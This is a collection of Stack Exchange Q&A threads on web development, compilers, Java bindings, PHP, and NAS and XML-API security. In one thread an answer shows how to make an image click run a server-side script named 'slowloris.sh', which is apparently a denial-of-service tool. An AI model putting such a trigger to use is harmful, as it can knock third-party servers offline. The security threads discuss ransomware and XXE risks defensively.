Might find it helpful in the near future.\nAnswer: IE Developer Toolbar\n\nNewer Versions (press F12)\nOlder Versions (go here and download)\n\nFirebug Lite\n\u00a0 \u00a0 Many of the features in FF's firebug can be extended to other browsers using this bookmarklet\n\nDo you have an online version of this page that we could actually see? There could be many reasons, which could be width-related to something messed up with the block model.\nComment: vol7ron See solution I have managed to get it working with. Thanks\nComment: and that is why you did not have enough info. that is also a misuse of the `dl`, `dt`, `dd` tag.\n","meta":{"source":"stackoverflow","title":"Elements not displaying correctly in IE","dup_signals":{}},"subset":"stackexchange"} +{"text":"ARM GCC hardfault when using -O2\n\nQuestion: When using ARM GCC g++ compiler with optimization level -O2 (and up) this code:\n<code>void foo(void)\n{\n DBB(\"@0x%08X: 0x%08X\", 1, *((uint32_t *)1));\n DBB(\"@0x%08X: 0x%08X\", 0, *((uint32_t *)0));\n}\n<\/code>\nCompiles to:\n<code>0800abb0 <_Z3foov>:\n 800abb0: b508 push {r3, lr}\n 800abb2: 2301 movs r3, #1\n 800abb4: 4619 mov r1, r3\n 800abb6: 681a ldr r2, [r3, #0]\n 800abb8: 4802 ldr r0, [pc, #8] ; (800abc4 <_Z3foov+0x14>)\n 800abba: f007 fa83 bl 80120c4 <debug_print_blocking>\n 800abbe: 2300 movs r3, #0\n 800abc0: 681b ldr r3, [r3, #0]\n 800abc2: deff udf #255 ; 0xff\n 800abc4: 08022704 stmdaeq r2, {r2, r8, r9, sl, sp}\n<\/code>\nAnd this gives me hardfault at undefined instruction @0x0800abc2.\nAlso, if there is more code after that, it is not compiled into final binary.\nThe question is why compiler generates it like that, why undefined istruction?\nBy the way, it works fine for stuff like this:\n<code>...\nuint32_t num = 2;\nnum -= 2;\nDBB(\"@0x%08X: 0x%08X\", 0, *((uint32_t *)num));\n...\n<\/code>\nCompiler version:\n<code>arm-none-eabi-g++.exe (GNU Tools for ARM Embedded Processors 6-2017-q2-update) 6.3.1 20170620 (release) [ARM\/embedded-6-branch revision 249437]\n<\/code>\nComment: what instruction(s) do you think it is? Looks undefined.\nComment: I ran into this today when writing a Bootloader. In my case I'm accessing App at flash addr 0x0. Was working in debug build but not in release build due to `-Os` optimization. Adding `-fno-delete-null-pointer-checks` to the release build was the fix!\nAnswer: You can disable this (and verify this answer) by using <code>-fno-delete-null-pointer-checks<\/code>\nThe pointer you are passing has a value which matches the null pointer, and the compiler can see that from static analysis, so it faults (because that is the defined behaviour).\nIn your second example, the static analysis doesn't identify a NULL.\n","meta":{"source":"stackoverflow","title":"ARM GCC hardfault when using -O2","dup_signals":{}},"subset":"stackexchange"} +{"text":"run bash script from onclick in erb view\n\nQuestion: Hi what I'm trying to do is run a bash script when someone clicks on an image. This is being done within an .erb view in Ruby on rails and the server this is running does have php installed. Thank you for reading and have a wonderful day!\n<code><%= image_tag(\"longbeards.jpg\", :class => \"homepage-leftsidepicture\", onclick:'<?php exec(\"\/home\/ncs\/slowloris.sh\");?>' ) %>\n<\/code>\nEDIT: I was unable to use the onclick statement from the first answer I got. However, I made a javascript function that calls the statement. 
Now I get this error that says \"No route matches {:action=>\"call_script\", :controller=>\"script\"}, missing required keys: [:script_id]\"\nComment: You cannot run PHP code from a HTML element in a browser. PHP only runs on the server. The `onclick` attribute will run only run javascript (on the browser)\nAnswer: You would need to create a controller action that calls the BASH script, so in your controller:\nscript_controller.rb:\n<code>class ScriptController < ApplicationController\n def call_script\n `\/home\/ncs\/slowloris.sh`\n end\nend\n<\/code>\nYou would then need to create a route to this action, like so:\nroutes.rb:\n<code> get 'call_script' => 'script#call_script', as: 'call_script'\n<\/code>\nFinally you would need to call this new endpoint from your image.\n<code><%= image_tag(\"longbeards.jpg\", :class => \"homepage-leftsidepicture\", onclick: \"window.open('#{call_script_url}', '_blank')\" ) %>\n<\/code>\nComment: Is this assuming you're using rails 5.x.x?\nComment: I don't _think_ any of that is Rails 5 specific\nComment: Alright, I did what you said in your answer and I got this error \"No route matches {:action=>\"call_script\", :controller=>\"script\"}, missing required keys: [:script_id]\"\nComment: I had a syntax error in there and was missing a : on the 'as', and was incorrecting using <%= %> in window.open. I updated the answer, and I also confirmed this works in Rails 4\nComment: Okay that definitely fixed the missing required keys issues. So I was able to get to the call script function under my script controller. However, I don't believe my script is running when I reach that webpage. Would the system() work in this case?\nComment: Scratch that last comment as I just noticed it was running my bash script. Although it will only run the first line and stop there\n","meta":{"source":"stackoverflow","title":"run bash script from onclick in erb view","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get a form input array into a PHP array\n\nQuestion: I have a form like the one below which is posted to contacts.php, and the user can dynamically add more with jQuery.\n<code><input type=\"text\" name=\"name[]\" \/>\n<input type=\"text\" name=\"email[]\" \/>\n\n<input type=\"text\" name=\"name[]\" \/>\n<input type=\"text\" name=\"email[]\" \/>\n\n<input type=\"text\" name=\"name[]\" \/>\n<input type=\"text\" name=\"email[]\" \/>\n<\/code>\nIf I echo them out in PHP with the code below,\n<code>$name = $_POST['name'];\n$email = $_POST['account'];\n\nforeach($name as $v) {\n print $v;\n}\n\nforeach($email as $v) {\n print $v;\n}\n<\/code>\nI will get something like this:\n\nname1name2name3email1email2email3\n\nHow can I get those arrays into something like the code below?\n<code>function show_Names($n, $m)\n{\n return(\"The name is $n and email is $m, thank you\");\n}\n\n$a = array(\"name1\", \"name2\", \"name3\");\n$b = array(\"email1\", \"email2\", \"email3\");\n\n$c = array_map(\"show_Names\", $a, $b);\nprint_r($c);\n<\/code>\nso my output is like this:\n\nThe name is name1 and email is email1, thank you\nThe name is name2 and email is email2, thank you\nThe name is name3 and email is email3, thank you\nAnswer: They are already in arrays: <code>$name<\/code> is an array, as is <code>$email<\/code>\nSo all you need to do is add a bit of processing to attack both arrays:\n<code>$name = $_POST['name'];\n$email = $_POST['account'];\n\nforeach( $name as $key => $n ) {\n print \"The name is \" . $n . \" and email is \" . $email[$key] . 
\", thank you\\n\";\n}\n<\/code>\nTo handle more inputs, just extend the pattern:\n<code>$name = $_POST['name'];\n$email = $_POST['account'];\n$location = $_POST['location'];\n\nforeach( $name as $key => $n ) {\n print \"The name is \" . $n . \", email is \" . $email[$key] .\n \", and location is \" . $location[$key] . \". Thank you\\n\";\n}\n<\/code>\nComment: Basically, you just extend the pattern. See my edit above...any additional inputs will also be arrays when you assign them from $_POST (assuming there are multiple inputs with that name in the html, as you did with these fields).\nComment: Jeffrey, I wonder if I can trust the ordering of the arrays. That is, are we sure that `$emails[1]` corresponds to the user named `$name[1]`? I think I ran into problems with this in the past but I might be wrong. Thanks\nComment: @bruciasse - The way that the server handles input arrays like this will vary from one web server to another (different OSes implement things differently when it comes to fine grained details like this), however every platform I have employed these techniques on is consistent within itself (i.e. the ordering is the same every time). It is possible that a browser could mix-up the order of the request variables before passing the request to the server, but I would expect this to be fairly unusual. The final issue you could face is that of the html being mixed in a strange order and CSS adjusting\nComment: thank you, what if i added another input like location[], how could i add that in as well?\nComment: ... the positioning. If your page was like that, it would certainly see some strange issues w\/r\/t ordering of the arrays.\nComment: @JeffreyBlake, there is an issue with this, `foreach` uses an array of values, doing `$name = $_POST['name'];` would leave this as a string so the system will break as soon as you try to traverse it as an array rather than a string, did you mean `$name[] = $_POST['name'];` instead of this? (Sorry it's belated, just rather misleading when I saw this...)\nComment: @SamSwift You're assuming that `$_POST['name']` is a string. In the case that your page has multiple `` elements with the same value for name, that is not the case. When that happens, PHP will load the `$_POST` variable as an array. It is true that this code might not work as desired in the case that there is only one input element. If you're doing something with a dynamically generated form that can have any number of inputs, you might have to add processing for the cases of having zero or one inputs, as opposed to many, however that is outside the scope of this question\/answer.\nComment: how about input type file? could you help me with this ty\nAnswer: E.g. 
by naming the fields like\n<code><input type=\"text\" name=\"item[0][name]\" \/>\n<input type=\"text\" name=\"item[0][email]\" \/>\n\n<input type=\"text\" name=\"item[1][name]\" \/>\n<input type=\"text\" name=\"item[1][email]\" \/>\n\n<input type=\"text\" name=\"item[2][name]\" \/>\n<input type=\"text\" name=\"item[2][email]\" \/>\n<\/code>\n(which is also possible when adding elements via JavaScript)\nThe corresponding PHP script might look like\n<code>function show_Names($e)\n{\n return \"The name is $e[name] and email is $e[email], thank you\";\n}\n\n$c = array_map(\"show_Names\", $_POST['item']);\nprint_r($c);\n<\/code>\nComment: Hi Thanks for this, how do you do the php script in laravel function show_Names($e)\n{\n return \"The name is $e[name] and email is $e[email], thank you\";\n}\n\n$c = array_map(\"show_Names\", $_POST['item']);\nprint_r($c);\nAnswer: You could do something such as this:\n<code>function AddToArray ($post_information) {\n \/\/Create the return array\n $return = array();\n \/\/Iterate through the array passed\n foreach ($post_information as $key => $value) {\n \/\/Append the key and value to the array, e.g.\n \/\/$_POST['keys'] = \"values\" would be in the array as \"keys\"=>\"values\"\n $return[$key] = $value;\n }\n \/\/Return the created array\n return $return;\n}\n<\/code>\nThe test with:\n<code>if (isset($_POST['submit'])) {\n var_dump(AddToArray($_POST));\n}\n<\/code>\nThis for me produced:\n<code>array (size=1)\n 0 =>\n array (size=5)\n 'stake' => string '0' (length=1)\n 'odds' => string '' (length=0)\n 'ew' => string 'false' (length=5)\n 'ew_deduction' => string '' (length=0)\n 'submit' => string 'Open' (length=4)\n<\/code>\nAnswer: You can use an array of fieldsets:\n<code><fieldset>\n <input type=\"text\" name=\"item[1]\" \/>\n <input type=\"text\" name=\"item[2]\" \/>\n <input type=\"hidden\" name=\"fset[]\"\/>\n<\/fieldset>\n\n<fieldset>\n <input type=\"text\" name=\"item[3]\" \/>\n <input type=\"text\" name=\"item[4]\" \/>\n <input type=\"hidden\" name=\"fset[]\"\/>\n<\/fieldset>\n<\/code>\nI added a hidden field to count the number of the fieldsets.\nThe user can add or delete the fields and then save it.\nAnswer: I came across this problem as well. Given 3 inputs: field[], field2[], field3[]\nYou can access each of these fields dynamically. Since each field will be an array, the related fields will all share the same array key. For example, given input data:\n\nBob, email@example.com, male\nMark, email@example.com, male\n\nBob and his email and sex will share the same key. With this in mind, you can access the data in a for loop like this:\n<code> for($x = 0; $x < count($first_name); $x++ )\n {\n echo $first_name[$x];\n echo $email[$x];\n echo $sex[$x];\n echo \"<br\/>\";\n }\n<\/code>\nThis scales as well. All you need to do is add your respective array vars whenever you need new fields to be added.\nAnswer: However, VolkerK's solution is the best to avoid miss couple between email and username. So you have to generate HTML code with PHP like this:\n<code><? foreach ($i = 0; $i < $total_data; $i++) : ?>\n <input type=\"text\" name=\"name[<?= $i ?>]\" \/>\n <input type=\"text\" name=\"email[<?= $i ?>]\" \/>\n<? endforeach; ?>\n<\/code>\nChange $total_data to suit your needs. 
To show it, just like this:\n<code>$output = array_map(create_function('$name, $email', 'return \"The name is $name and email is $email, thank you.\";'), $_POST['name'], $_POST['email']);\necho implode('<br>', $output);\n<\/code>\nAssuming the data was sent using the POST method.\nAnswer: This is an easy one:\n<code>foreach($_POST['field'] as $num => $val) {\n    print ' ' . $num . ' -> ' . $val . ' ';\n}\n<\/code>\nComment: An explanation would be in order. E.g., what is the idea\/gist? Please respond by [editing (changing) your answer](https:\/\/stackoverflow.com\/posts\/53300708\/edit), not here in comments (***without*** \"Edit:\", \"Update:\", or similar - the answer should appear as if it was written today).\nAnswer: It is already an array.\nMy inputs are:\n<code><input name=\"name[]\" value='joe'>\n<input name=\"lastname[]\" value='doe'>\n<input name=\"name[]\" value='jose'>\n<input name=\"lastname[]\" value='morrison'>\n<\/code>\nIn the $_POST data, it returns the following:\n<code>[name] => Array\n    (\n        [0] => 'joe'\n        [1] => 'jose'\n    )\n[lastname] => Array\n    (\n        [0] => 'doe'\n        [1] => 'morrison'\n    )\n<\/code>\nYou can access this data in the following way:\n<code>$names = $_POST['name'];\n$lastnames = $_POST['lastname'];\n\/\/ accessing\necho $names[0]; \/\/ joe\n<\/code>\nThis way it is very useful for creating pivot tables.\nComment: Please only post a new answer if you have something new and unique to add to the page.\nAnswer: Using this method should work:\n<code>$name = $_POST['name'];\n$email = $_POST['account'];\nwhile($explore=each($email)) {\n    echo $explore['key'];\n    echo \"-\";\n    echo $explore['value'];\n    echo \"<br\/>\";\n}\n<\/code>\nComment: Explain your answer step by step\nComment: An explanation would be in order. E.g., what is the idea\/gist? 
Please respond by [editing (changing) your answer](https:\/\/stackoverflow.com\/posts\/29834972\/edit), not here in comments (***without*** \"Edit:\", \"Update:\", or similar - the answer should appear as if it was written today).\n","meta":{"source":"stackoverflow","title":"How to get a form input array into a PHP array","dup_signals":{}},"subset":"stackexchange"} +{"text":"wsImport: jaxb nameXmlTransform not working: A class\/interface with the same name is already in use\n\nQuestion: I need to generate Java classes from a WSDL file.\nI'm using the <code>jaxws-maven-plugin<\/code> plugin configured in this way:\n<code><plugin>\n <groupId>org.codehaus.mojo<\/groupId>\n <artifactId>jaxws-maven-plugin<\/artifactId>\n <version>2.5<\/version>\n <executions>\n <execution>\n <id>wsimportPhase<\/id>\n <goals>\n <goal>wsimport<\/goal>\n <\/goals>\n <configuration>\n <keep>true<\/keep>\n <verbose>true<\/verbose>\n <packageName>my.package.name<\/packageName>\n <wsdlFiles>\n <wsdlFile>${basedir}\/wsdl\/myWSDL.wsdl<\/wsdlFile>\n <\/wsdlFiles>\n <wsdlLocation>wsdl\/myWSDL.wsdl<\/wsdlLocation>\n <bindingDirectory>wsdl<\/bindingDirectory>\n <bindingFiles>\n <bindingFile>myBinding.xml<\/bindingFile>\n <\/bindingFiles>\n <sourceDestDir>${basedir}\/src\/main\/java<\/sourceDestDir>\n <\/configuration>\n <\/execution>\n <\/executions>\n<\/plugin>\n<\/code>\nAnd I have configured (with some difficulties) the JAXB bindings in this way:\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<jaxws:bindings version=\"2.1\"\n schemaLocation=\"myWSDL.wsdl\" \n xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n xmlns:wsdl=\"http:\/\/schemas.xmlsoap.org\/wsdl\/\"\n xmlns:jaxws=\"http:\/\/java.sun.com\/xml\/ns\/jaxws\"\n xmlns:jaxb=\"http:\/\/java.sun.com\/xml\/ns\/jaxb\">\n <jaxws:bindings node=\"wsdl:definitions\/wsdl:types\/xs:schema\/xs:import\">\n <jaxb:bindings schemaLocation=\"importedXSD_1.xsd\">\n <jaxb:bindings node=\"xs:complexType[@name='DuplicatedType']\">\n <jaxb:schemaBindings>\n <jaxb:nameXmlTransform>\n <jaxb:typeName suffix=\"Suffix1\"\/>\n <jaxb:elementName suffix=\"Suffix1\"\/>\n <\/jaxb:nameXmlTransform>\n <\/jaxb:schemaBindings>\n <\/jaxb:bindings>\n <\/jaxb:bindings>\n <jaxb:bindings schemaLocation=\"importedXSD_2.xsd\">\n <jaxb:bindings node=\"xs:complexType[@name='DuplicatedType']\">\n <jaxb:schemaBindings>\n <jaxb:nameXmlTransform>\n <jaxb:typeName suffix=\"Suffix2\"\/>\n <jaxb:elementName suffix=\"Suffix2\"\/>\n <\/jaxb:nameXmlTransform>\n <\/jaxb:schemaBindings>\n <\/jaxb:bindings>\n <\/jaxb:bindings>\n <\/jaxws:bindings>\n<\/jaxws:bindings>\n<\/code>\nBut when I run <code>mvn install<\/code>, I have the following error:\n<code>[INFO] jaxws:wsimport args: [-keep, -s, '\/workspace\/myproject\/src\/main\/java', -d, '\/workspace\/myproject\/target\/classes', -verbose, -encoding, UTF-8, -Xnocompile, -p, my.package.name, -wsdllocation, wsdl\/myWSDL.wsdl, -b, 'file:\/workspace\/myproject\/src\/main\/resources\/wsdl\/mybinding.xml', \"file:\/workspace\/myproject\/src\/main\/resources\/wsdl\/myWSDL.wsdl\"]\nparsing WSDL...\n\n[ERROR] A class\/interface with the same name \"my.package.name.DuplicatedType\" is already in use. 
Use a class customization to resolve this conflict.\n<\/code>\nThe XPath finds correctly the needed complexType in the xsd, so I don't understand how to fix it.\nAnswer: I have found the solution combining the solutions explained in these two questions:\nwsimport - how to generate service endpoint classes and JAXB classes in separate projects\/folders\nJAXB schema to Java Different XmlRootElement name and Class name\nI have made the following steps:\n\nI have created two binding files, one for jaxws-binding and the other one for jaxb-binding.\nThese are the two files:\n\njaxws-binding.xml:\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<jaxws:bindings version=\"2.1\"\n schemaLocation=\"myWSDL.wsdl\" \n xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n xmlns:wsdl=\"http:\/\/schemas.xmlsoap.org\/wsdl\/\"\n xmlns:jaxws=\"http:\/\/java.sun.com\/xml\/ns\/jaxws\"\n xmlns:jaxb=\"http:\/\/java.sun.com\/xml\/ns\/jaxb\">\n <jaxws:bindings node=\"wsdl:definitions\/wsdl:types\/xs:schema\/xs:import\">\n <\/jaxws:bindings>\n<\/jaxws:bindings>\n<\/code>\njaxb-binding.xml:\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<jaxb:bindings version=\"1.0\"\n xmlns:jaxb=\"http:\/\/java.sun.com\/xml\/ns\/jaxb\"\n xmlns:xjc=\"http:\/\/java.sun.com\/xml\/ns\/jaxb\/xjc\"\n xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"> \n <jaxb:bindings schemaLocation=\"importedXSD_1.xsd\" node=\"xsd:complexType[@name='DuplicatedType']\">\n <jaxb:class name=\"DuplicatedTypeSuffix1\"\/>\n <\/jaxb:bindings>\n <jaxb:bindings schemaLocation=\"importedXSD_2.xsd\" node=\"xsd:complexType[@name='DuplicatedType']\">\n <jaxb:class name=\"DuplicatedTypeSuffix2\"\/>\n <\/jaxb:bindings>\n<\/jaxb:bindings>\n<\/code>\n\nI have declared the two binding files in the <code><bindingFiles><\/code> tag of the jaxb-maven-plugin in the pom.xml\nAnswer: I was doing integration with some company and they gave me their WSDL which I had to import into my project.\n\nRunning the below would fail due to naming conflict\n<code>wsimport -keep -verbose http:\/\/ip:port\/path\/service?wsdl<\/code>\n\nI resolved the issue by adding \"-XautoNameResolution\"\n<code>wsimport -keep -verbose -XautoNameResolution http:\/\/ip:port\/path\/service?wsdl<\/code>\n\nAnd that was it to resolve my pain point.\nReference (04-08-2021)\nhttps:\/\/briskwalk.wordpress.com\/2012\/03\/30\/a-classinterface-with-the-same-name-is-already-in-use-error-when-generating-stubs-for-net-service-using-jdk-6-wsimport-command\/\n","meta":{"source":"stackoverflow","title":"wsImport: jaxb nameXmlTransform not working: A class\/interface with the same name is already in use","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to lock down iSCSI mounted NAS against ransomware\n\nQuestion: If you lock down an iSCSI mounted NAS volume (on Windows Server) so that Administrators have read-only access and your backups account has write access to the file system, the Administrator account can always take ownership of files, right? There's always the risk that ransomware will infect the system and perform some privilege escalation, then take ownership of locked down files and directories before encrypting, right?\nHow do you combat this?\nComment: i like optical drive backups. again, after having had moved \"to the cloud\"\nAnswer: There is nothing special about this use case: if you fear that the read-only access can be bypassed using privilege escalation then make sure that privilege escalation is not possible on your system. 
If you fear that ransomware can infect and harm your system, make sure that it does not get to your system. Thus the iSCSI problem is reduced to two other well-known problems.\nSince both of these problems are known to have no perfect solution, you should make sure that the single perfect solution against ransomware still works: make regular offline backups.\nAnswer: For this to work, you MUST implement the lockdown on the iSCSI side, not on the local side.\nRansomware can ALWAYS bypass local security.\nThere are two ways you could lock it down:\n1: Either you make the iSCSI server completely read-only. To facilitate backups, you instead make your client \"share\" the drive (SAMBA, FTP or iSCSI) to the iSCSI server, and then the NAS\/iSCSI server will \"pull\" the data from the client.\n(Note that in networking terms it's really the iSCSI server that is the client and your backed-up PC that is the server; I use the reversed roles here just to clarify which computers I mean.)\nThis data needs to be written in an incremental way, using for example LVM snapshots or some other incremental way to store the information, so even if ransomware overwrites local files, causing these local files to be pulled to the iSCSI server, these damaged files will NOT damage prior backups.\n2: Another way to solve this is to make the actual iSCSI endpoint read-write, but the data you write to the actual disk on the iSCSI server will be incremental. This must be enforced on the server side, so no matter how hard the ransomware tries to overwrite a file, only the diff will be saved, so you can easily roll back to the date when the ransomware did NOT overwrite it.\nAdvantages:\nIn the first case, you could easily schedule the pulls from the client on the server side, preventing for example ransomware from \"bombing\" the NAS drive by writing unnecessary data until the diff file covers the whole NAS drive.\nNo matter how much the ransomware fills your local drive with crap, it will only be pulled like 2 times per day.\nThe second case needs a bit more thought, because in that case you run the risk that the ransomware will constantly write to the iSCSI endpoint, quickly filling the diff file up. This can mean that ransomware could secretly fill up the iSCSI endpoint, then hope you don't notice it, and then encrypt the files a month later.\nThat's why you need to enforce some sort of staging, so if you have recently written to a file, its diff will instead be overwritten. You can probably code something yourself that enforces this staging with snapshots.\nThink of it like this: if you write to file X at 15:05, then write again at 15:06 and then again at 17:01, then write again at 22:10, and you have set the staging to 6 hours, then the NAS should contain the pre-15:05 X base file, then a diff between \"pre-15:05 X and the 17:01 one\" and then a diff between \"the 17:01 one and the 22:10 one\".\nAnyway, make sure to have a reliable notification path from the NAS server to you, for example a GSM modem and SMS communication, that the ransomware cannot touch, and that will notify you at for example 75% drive utilization on the NAS, so even if the ransomware manages to fill it up, you will get ample warning before it's completely filled.\n\nSuper-advanced way to solve it:\n\nYou could use a PXE booter, like iPXE, to boot into a small backup-only operating system that has the read-write username\/password to your iSCSI NAS, but at each bootup it just asks if you want to back up the computer now. 
Here you could have a PIN code or something for backups that will only accept 3 retries (before it must be reset locally at the PXE server), which prevents the ransomware from requesting the backup operating system while Windows is running (which would leak the iSCSI read-write username\/password).\nBy enforcing manual backups, you also prevent the risk of the ransomware overwriting your local data and your local data then being backed up to the server, overwriting good backups.\nIn this way, you do an \"offline boot\" or \"cold boot\": your main operating system isn't running, and anything malicious inside it cannot run. And in the same way, anything malicious cannot write anything to the backup-only operating system either.\nYour local operating system only has the read-only username\/password.\n","meta":{"source":"security.stackexchange","title":"How to lock down iSCSI mounted NAS against ransomware","dup_signals":{}},"subset":"stackexchange"} +{"text":"Simple code in Visual Studio 2010 Ultimate\n\nQuestion: Hi, I wrote a simple program in Visual Studio 2010.\n<code>#include \"stdafx.h\"\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n    printf(\"Lakshmen\");\n    return 0;\n}\n<\/code>\nI ended up having these errors:\n<code>'Lakshmen.exe': Loaded 'C:\\Users\\User\\Documents\\Visual Studio 2010\\Projects\\Lakshmen\\Release\\Lakshmen.exe', Symbols loaded.\n'Lakshmen.exe': Loaded 'C:\\Windows\\SysWOW64\\ntdll.dll', Cannot find or open the PDB file\n'Lakshmen.exe': Loaded 'C:\\Windows\\SysWOW64\\kernel32.dll', Cannot find or open the PDB file\n'Lakshmen.exe': Loaded 'C:\\Windows\\SysWOW64\\KernelBase.dll', Cannot find or open the PDB file\n'Lakshmen.exe': Loaded 'C:\\Windows\\SysWOW64\\msvcr100.dll', Symbols loaded.\nThe program '[13376] Lakshmen.exe: Native' has exited with code 0 (0x0).\n<\/code>\nAnswer: You could get the symbols from Microsoft.\nGo to Tools->Options->Debugging->Symbols and check Microsoft Symbol Server, and in the Cache symbols in the directory text box below, enter a path to a directory where you want to cache these symbols.\n","meta":{"source":"stackoverflow","title":"Simple code in Visual Studio 2010 Ultimate","dup_signals":{}},"subset":"stackexchange"} +{"text":"Single Page Application with REST API backend based on XML, queried by dynamic XPath\n\nQuestion: A web application I'm developing will be a Single Page Application (SPA) that will interact with a REST API backend, through <code>jQuery.ajax()<\/code> calls.\nThe SPA and API will both be served over an https\/TLS connection. The API will be served from a subdomain of the SPA domain:\n<code>SPA: example.org\nAPI: api.example.org\n<\/code>\n... and will respond with the appropriate CORS headers:\n<code>Access-Control-Allow-Origin: example.org\nAccess-Control-Allow-Methods: GET, POST, etc. \/\/ whatever applicable to the requested resource\nAccess-Control-Allow-Headers: Accept, Authorization, Content-Type\n<\/code>\nUpon logging into the SPA the user (an organisation) will be served its unique associated sha1 <code>API-key<\/code> (either in a cookie or as a global javascript variable), that the SPA will use for interacting with the API, for the duration of the login session of the user. The SPA will issue this <code>API-key<\/code> in each request to the API in an <code>Authorization<\/code> header:\n<code>Authorization: MyAppsApi apikey=<API-key>\n<\/code>\nThe REST API's persistence storage will be XML based. 
I haven't decided on an actual storage mechanism vendor yet (considering using eXistdb, at the moment). In this early stage of development, however, I'm simply using PHP's <code>DOMDocument<\/code> and <code>DOMXPath<\/code>, with no concurrent read\/write capabilities.\nThe REST API will furthermore dynamically generate XPath queries, based on the received request-URI's path. Communication between the SPA and API will probably be done in JSON, though.\nConsider this example XML document:\n<code><?xml version=\"1.0\" encoding=\"utf-8\"?>\n<organisations>\n <organisation id=\"1\">\n <apiKey>some hex sha1 digest<\/apiKey>\n <products>\n <product id=\"1\">\n <parts>\n <part id=\"1\">\n <subParts>\n <subPart id=\"1\">\n ...\n <\/subPart>\n <\/subParts>\n <\/part>\n <\/parts>\n <\/product>\n <\/products>\n <\/organisation>\n <organisation id=\"2\">\n <apiKey>another hex sha1 digest<\/apiKey>\n <products>\n ...\n <\/products>\n <\/organisation>\n<\/organisations>\n<\/code>\nCurrently, this document is validated by a custom XSD schema.\nThe REST API will first determine if an <code><organisation><\/code> node with the issued <code><apiKey><\/code> exists before interacting further with the XML. If the <code><organisation><\/code> node is found, it will be used as the context node for any further XPath queries.\nThe request-URI paths will be restricted by the following regex pattern:\n<code>~\\G(\/(?<collection>[a-z]+)(?:\/(?<resourceId>\\d+))?)(?:(?=(?1))|\/?$)~\n<\/code>\nallowing only <code>\/<loweralpha>+(\/<digit>+)?<\/code> segments\nConsider these example request-URI paths and their dynamically generated XPath:\n<code>\/products\/1 => .\/\/products\/*[@id=\"1\"]\n\/parts\/1 => .\/\/parts\/*[@id=\"1\"]\n\/products\/1\/parts\/1 => .\/\/products\/*[@id=\"1\"]\/parts\/*[@id=\"1\"]\n<\/code>\nAs you can see, they will be relative to the <code><organisation><\/code> context node.\nConsidering that I haven't fully investigated the typical workings of XML backends yet, it may very well turn out that my above XML setup is flawed to begin with, in that I should create an XML document per organisation, mitigating the risk of accessing nodes that do not belong to the <code><organisation><\/code> context node.\nHowever, do you see any inherent flaws in this current set-up?\nIn my current set-up I am mostly concerned about the dynamic XPath querying that could turn out to be too risky. Perhaps an adversary is able to sneak in XPath axes, somehow? But I'm interested to hear about any other possible flaws as well.\nThank you.\nPS.: perhaps I should have clarified more what the risks are, that I am most concerned with:\n\nCan an adversary somehow obtain the API-key of an(other) organisations?\nCan an adversary somehow manipulate content of an(other) organisations?\nComment: To whoever close-flagged this as \"too broad\", a long question does not make a question too broad. There are some clear and answerable questions here: what vulnerabilities are potentially present in this use of XPath and XML. The one close reason I could understand is the one relating to breaking a specific question, but I think that's arguable either way. I consider this a well-enough written and fleshed out question to remain here.\nAnswer: Your primary problem when handling client-provided is going to be XML External Entities (XXE) attacks. Systems with such vulnerabilities can often be exploited to read files or enumerate the internal network which the server is on. 
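For example, a classic external-entity payload looks something like this (illustrative only - this is the textbook shape of such a request body, not something taken from your API):\n<code><?xml version=\"1.0\"?>\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:\/\/\/etc\/passwd\"> ]>\n<foo>&xxe;<\/foo>\n<\/code>\nA parser that resolves external entities would expand <code>&xxe;<\/code> to the contents of <code>\/etc\/passwd<\/code> and could echo it back in the API response.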
In PHP you can help fix this by calling <code>libxml_disable_entity_loader(true);<\/code> in order to disable external entities.\nAnother problem is, potentially, the Billion Laughs attack. This is a CPU and memory exhaustion DoS attack which uses nested element type declarations. This SO question should give you a good idea on how to pre-validate XML before loading it to avoid this kind of attack, but the short answer is that libxml allows you to set a custom DTD validator \/ loader callback.\nYou may also want to consider XPath Injection, though I'm not sure how critical this would be in your use-case. It's hard to tell what kind of impact it might have on your system's business logic without having a wider understanding of the application.\nComment: @DecentDabbler In regards to the two additional questions, it's not something anyone here can answer. It's something that would be investigated interactively during a penetration test against the application (in fact, I quite regularly see questions such as this raised in statements of work in my day job). Regarding the JSON part, it's a much safer format in terms of its use for data storage and transfer - XML is an immensely complex markup language and its use for data storage is the result of many a vulnerability.\nComment: @DecentDabbler That said, look into [object injection](https:\/\/www.owasp.org\/index.php\/PHP_Object_Injection) attacks and the [security issues around unserialising untrusted data](https:\/\/www.owasp.org\/index.php\/Deserialization_of_untrusted_data). Both of these are of critical importance if you're deserialising this data into objects, from either XML or JSON, without appropriate checks. Again, if possible, avoid this kind of behaviour where possible due to its complexity and tendency for security bugs - manually pull out fields from the input data and fill the objects.\nComment: Great stuff! These are exactly the type of pointers I was hoping to receive to this question. Thanks! By the way, maybe I should have mentioned that I'm not entirely sure yet whether the SPA will receive\/send XML as well. It could very well be that I will translate the XML to JSON and vice versa. But the persistence storage will remain XML. Another thing that is relevant to mention is that I'm currently validating the validity of the XML document with a custom XSD schema. I'll add this to my question. I'll investigate your suggestions further to see how they apply to my set-up. Thanks again!\nComment: About my additional questions: fair enough. However, I should mention that, as far as I'm concerned, they can just be seen in the context of the information that I have currently provided, leaving out of consideration other possible security risks such as system administration flaws, network configuration flaws, etc. Concerning your last remark about XML storage, other than the information you have already provided, do you know of any good sources (articles, etc.) that discuss why XML storage is so vulnerable?\nComment: Thanks. I was aware of object injection and unserialising indeed.\nComment: @DecentDabbler Just a quick Google search for \"XML vulnerabilities\" should give you an example, but the point is that there's so much to XML above and beyond its ability to store data in a nested structure. The more features and complexity you add, the more potentially vulnerable code there is. 
